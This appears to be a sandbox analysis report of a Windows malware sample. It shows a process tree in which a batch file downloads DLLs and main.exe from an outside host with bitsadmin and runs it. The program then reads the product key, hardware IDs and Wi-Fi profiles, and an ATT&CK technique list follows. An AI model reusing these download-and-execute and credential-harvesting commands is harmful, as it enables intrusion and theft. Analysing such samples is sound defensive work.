"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
4⤵
PID:3388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
4⤵
PID:6432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2996 /prefetch:8
4⤵
PID:1752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
4⤵
PID:7868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
4⤵
PID:748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
4⤵
PID:7912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1
4⤵
PID:8036

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
4⤵
PID:7456

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
4⤵
PID:6264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
4⤵
PID:6452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
4⤵
PID:7988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1
4⤵
PID:4616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,2072643553570045854,3913099994632447518,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
4⤵
PID:6188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=stanky+danky+maymays
3⤵
PID:2924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa62b346f8,0x7ffa62b34708,0x7ffa62b34718
4⤵
PID:6904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\nagogy.bat" "
1⤵
PID:7112

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer "Downloading libcurl-x64.def" "https://cdn-1.thughunter.repl.co/cdn/libcurl-x64.def" "C:\Users\Admin\AppData\Local\Temp\libcurl-x64.def"
2⤵
- Download via BitsAdmin
PID:7980

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer "Downloading libcurl-x64.dll" "https://cdn-1.thughunter.repl.co/cdn/libcurl-x64.dll" "C:\Users\Admin\AppData\Local\Temp\libcurl-x64.dll"
2⤵
- Download via BitsAdmin
PID:4348

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer "Downloading libgcc_s_seh-1.dll" "https://cdn-1.thughunter.repl.co/cdn/libgcc_s_seh-1.dll" "C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll"
2⤵
- Download via BitsAdmin
PID:4864

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer "Downloading libsodium-23.dll" "https://cdn-1.thughunter.repl.co/cdn/libsodium-23.dll" "C:\Users\Admin\AppData\Local\Temp\libsodium-23.dll"
2⤵
- Download via BitsAdmin
PID:5828

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer "Downloading libsodium-24.def" "https://cdn-1.thughunter.repl.co/cdn/libsodium-24.def" "C:\Users\Admin\AppData\Local\Temp\libsodium-24.def"
2⤵
- Download via BitsAdmin
PID:4948

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer "Downloading sqlite3.def" "https://cdn-1.thughunter.repl.co/cdn/sqlite3.def" "C:\Users\Admin\AppData\Local\Temp\sqlite3.def"
2⤵
- Download via BitsAdmin
PID:7132

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer "Downloading sqlite3.dll" "https://cdn-1.thughunter.repl.co/cdn/sqlite3.dll" "C:\Users\Admin\AppData\Local\Temp\sqlite3.dll"
2⤵
- Download via BitsAdmin
PID:2628

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer "Downloading main.exe" "https://cdn-1.thughunter.repl.co/cdn/main.exe" "C:\Users\Admin\AppData\Local\Temp\main.exe"
2⤵
- Download via BitsAdmin
PID:8132

C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
2⤵
PID:1128

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
3⤵
PID:6580

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:7176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
3⤵
PID:4472

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:7576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Get-ItemPropertyValue -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
3⤵
PID:7784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
PID:6980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get name
3⤵
PID:6220

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
PID:6264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get name
3⤵
PID:6756

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
4⤵
PID:4348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get Caption /value
3⤵
PID:7020

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption /value
4⤵
PID:2124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get currentrefreshrate
3⤵
PID:5384

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get currentrefreshrate
4⤵
PID:4784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh wlan show profile
3⤵
PID:7880

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:4200

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6652

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7552

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2108

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5352

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x434 0x4ec
1⤵
PID:4612

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5292

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7644

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2824

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2448

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

Bootkit

T1067

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

Modify Registry

T1112

BITS Jobs

T1197

Credential Access

Discovery

Query Registry

System Information Discovery